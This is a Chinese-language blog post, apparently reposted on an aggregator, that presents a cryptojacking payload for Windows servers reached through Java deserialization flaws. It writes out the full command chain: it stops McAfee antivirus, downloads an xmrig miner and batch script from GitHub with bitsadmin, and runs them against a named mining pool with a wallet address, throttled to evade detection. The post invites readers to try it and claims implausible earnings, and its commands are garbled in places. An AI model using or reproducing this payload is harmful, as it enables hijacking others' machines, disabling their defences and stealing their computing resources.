最近，安全社區中有很多人都在討論如何利用Java反序列化漏洞來攻擊類似Apache、SOLR和WebLogic之類的系統。不說廢話，我們直接進入正題。目前絕大多數的此類攻擊針對的都是Linux/Unix系統，但是我近期發現了一種針對Windows系統的攻擊方法。

PS：本文僅用于技術討論與分享，嚴禁用于非法用途

攻擊代碼如下：

cmd/cnet stop"McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer"xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe"/download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;

實際的Payload分析

關閉McAfee反病毒軟件（我不明白社區中的這種技術為啥只關掉McAfee…）：

netstop "McAfee McShield;netstop mcafeeframework;

使用bitsadmin從GitHub下載加密貨幣挖礦程序和一個batch腳本文件：

bitsadmin.exe/transfer "xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe/transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dirxmrig*;xmrig.bat;tasklist;

Batch腳本文件代碼如下：

taskkill/im /f xmrig.exe /tnetstop "McAfee McShield"netstop mcafeeframeworkxmrig.exe-o http://monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6-p x --background --max-cpu-usage=50 --donate-level=1

首先，上述代碼會終止其他xmrig進程（可能是為了防止資源競爭）。接下來，它會關閉McAfee。然后便會開啟挖礦程序，并跟http://monerohash.com礦池（端口3333）進行連接。它只會占用大約50%的CPU資源，估計是為了避免被檢測到吧。

目前為止，這個挖礦程序的計算能力只能實現350哈希每秒，并為我挖到了40個門羅幣（價值約為7000美元）。

感興趣的同學可以自己動手試一試，說不定會有一些意想不到的收獲。

總結

以上是生活随笔為你收集整理的利用Java反序列化漏洞在Windows上的挖矿实验的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。